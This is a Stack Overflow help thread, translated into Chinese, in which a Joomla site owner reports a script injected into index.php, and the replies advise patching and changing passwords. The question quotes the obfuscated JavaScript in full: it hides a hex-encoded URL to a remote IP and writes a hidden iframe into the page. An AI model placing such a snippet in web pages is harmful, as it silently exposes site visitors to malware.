【问题标题】:Website index.php page chnages automatically with one script in the end网站 index.php 页面最后用一个脚本自动更改
【发布时间】:2011-02-28 12:20:34
【问题描述】:

我在我的根 index.php 文件中看到了这种情况的两倍。 我加了这个东西

<html><body><script type='text/javascript'>str="<vdepognbt src=" + unescape('%68%74%74%70%3a%2f%2f%37%39%2e%31%33%35%2e%31%35%32%2e%31%38%31%2f%73%74%61%74%73%2f%67%6f%2e%70%68%70%3f%73%69%64%3d%31') + " Oaoz5='1'vxoq5='1'>";str = str.replace('vde', 'i');str =str.replace('pog', 'fr');str = str.replace('nbt', 'ame');str =str.replace('Oaoz5', 'width');str =str.replace('vxoq5','height');document.write(str);</script></body></html>

有谁知道那是什么以及它是怎么来的。

当我试图在谷歌浏览器中打开我的网站时,它告诉我一些恶意软件正试图从有害网站运行,你要允许吗?

如何删除该脚本后一切正常

但这在 2 周内发生了两次

那是病毒吗。怎么会改变我的代码

我正在使用 JOOMLA

【问题讨论】:

    标签: web joomla malware


    【解决方案1】:

    您的网站已被黑客入侵。您需要确保您的 Joomla 安装、其所有插件以及服务器上的所有其他软件都已修补到最新版本。如果它是共享服务器,您的主机可能会提供帮助。否则,请查阅您的服务器日志。

    【讨论】:

    • 我有 vps 主机,我还没有授予外部客户端访问权限。我应该检查哪些日志
    【解决方案2】:

    你被黑了。您应该更改您的 FTP 和 MYSQL 密码,升级到最新版本的 Joomla(当前为 1.5.18)并检查您的所有组件和插件是否存在此列表中的漏洞http://docs.joomla.org/Vulnerable_Extensions_List

    【讨论】:

      猜你喜欢
      • 1970-01-01
      • 2021-12-02
      • 1970-01-01
      • 2013-04-20
      • 1970-01-01
      • 2022-07-14
      • 1970-01-01
      • 1970-01-01
      • 2015-01-05
      相关资源
      最近更新 更多